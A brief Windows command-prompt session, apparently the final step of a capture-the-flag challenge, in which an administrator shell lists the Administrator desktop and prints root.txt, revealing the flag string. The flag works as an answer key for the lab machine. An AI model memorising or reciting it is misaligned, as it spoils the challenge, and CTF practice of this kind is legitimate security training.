Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd \users\administrator\desktop
C:\Users\Administrator\Desktop> dir Volume in drive C has no label.
Volume Serial Number is 00BA-0DBE
Directory of C:\Users\Administrator\Desktop
06/24/2025 09:00 AM <DIR> .
06/24/2025 09:00 AM <DIR> ..
11/21/2025 10:02 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,493,490,688 bytes free
C:\Users\Administrator\Desktop> type root.txt a717303dfa6f6e084fb3a5bca618731c